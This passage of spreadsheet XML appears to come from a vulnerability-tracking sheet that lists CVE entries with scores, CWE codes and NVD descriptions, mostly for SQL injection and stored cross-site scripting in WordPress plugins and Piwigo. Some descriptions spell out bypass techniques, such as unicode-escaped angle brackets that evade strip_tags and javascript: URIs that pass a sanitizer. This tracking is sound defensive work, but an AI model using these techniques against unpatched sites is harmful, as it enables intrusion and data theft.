          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane interpolates the administrator-controlled tax_rate_decimal_places setting into an ALTER TABLE statement for ip_tax_rates in Settings::index() without strict integer validation. A crafted setting value can add clauses to the schema-changing statement and remove or alter required database columns. The resulting schema corruption can permanently modify financial data structures and make the application unavailable. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33639</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42323</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/batch_manager.php accepts administrator-controlled dimension width, height, and ratio values and filesize values from the Batch Manager filter URL without numeric validation. The URL filter parser stores those values in the bulk_manager_filter session state, and later query construction concatenates them into SQL predicates, unlike the validated POST filter path. An authenticated administrator can use crafted filter values to execute time-based or other SQL expressions and potentially disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42323</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42324</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/element_set_ranks.php stores administrator-controlled image_order[] values without enforcing the existing sort-field whitelist. The stored album image_order expression is later concatenated into ORDER BY clauses by admin/batch_manager_global.php, admin/batch_manager_unit.php, include/section_init.inc.php, and include/ws_functions/pwg.categories.php. When at least one album contains at least one photo, an authenticated administrator can store a crafted expression and trigger it in a later album or Batch Manager query to disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42324</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83591</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via Regex Transformation in all versions up to, and including, 1.1.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The crafted payload uses only WordPress-permitted comment tags and attributes (an anchor with href and title), and the AMP sanitizer pipeline omits javascript: protocol blocking, meaning neither the comment save filter nor the AMP output stage removes the malicious URI introduced by the transformation.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83591</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84279</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'output_format' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the Pro Export/Genius feature to be enabled on the site, as the vulnerable fpd_pr_export AJAX action is only registered when that feature is active.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84279</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84280</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Order 'elements[].title' Parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload is written to the DOM via innerHTML within the beforeElementAdd JavaScript event handler when processing the elements[].title field from the stored order JSON, meaning execution occurs specifically when an administrator reviews shortcode orders in the WordPress admin panel.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84280</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84281</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'productTitle' in '_fpd_data' Order Item Meta in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fpd_save_order AJAX action is registered for unauthenticated users via wp_ajax_nopriv_fpd_save_order with no nonce or capability check, and the strip_tags() sanitization applied at save time is bypassed by submitting JSON unicode escape sequences (e.g. \u003c, \u003e), which json_decode() silently converts back to literal angle brackets when the order is rendered in the admin view.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84281</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84862</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to insecure deserialization in the Quartz JDBC job store. An authenticated attacker could exploit this vulnerability to execute arbitrary code on the affected system.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84862</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85750</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Piwigo before v16.4.0 is vulnerable to arbitrary file read and remote code execution in image upload handling when using the Imagick library due to insufficient validation and unsafe processing of user-supplied image files. By abusing format confusion (e.g., disguising SVG content as PNG), an attacker can trigger unintended interpretation of embedded SVG elements that reference local files. In more advanced scenarios, the Imagick support for Magick Scripting Language (MSL) may be abused to process attacker-controlled instructions, potentially leading to unauthorized server-side file writes and remote code execution, depending on configuration. This has been patched in 16.4.0.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85750</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93303</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via 'form_data' Rich Text Field via Draft Save/Resume in all versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires tricking a user into clicking an attacker-supplied draft resume URL, which the attacker constructs using the draft_key and access_token returned directly in the save response.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93303</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93654</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'cart_items[][product_name]' Parameter in all versions up to, and including, 7.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The checkout REST route uses permission_callback set to __return_true and the invoice loader performs no order ownership check, meaning an unauthenticated attacker can both persist the payload and ensure it is renderable to any logged-in user who accesses the invoice.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93654</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94573</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Elementor Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Field Value in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94573</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95864</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>The Themify Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'css[fonts]' Parameter in all versions up to, and including, 7.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce required to reach the vulnerable endpoint is embedded in plain sight within the front-end page markup for all visitors, reducing the access control to a CSRF token rather than an authentication barrier and making the endpoint fully exploitable by unauthenticated attackers.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95864</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95866</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The zero-length multipart file branch in wppb_save_avatar_value() writes the raw request value directly to user meta, bypassing the wppb_save_attachment_id()/wppb_verify_attachment_id() validation path; the stored payload is later adopted as a WordPress attachment URL and rendered unescaped by wppb_default_fields_make_upload_button() when an administrator views the affected account.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95866</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96039</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via first_name Parameter in all versions up to, and including, 1.8.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can obtain the valid order_id, order_num, and order_hash credentials required to reach the vulnerable action_to_pay() handler simply by placing a guest booking through the public [babe-booking-form] shortcode, making the full exploit chain reachable without any account.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96039</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96568</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
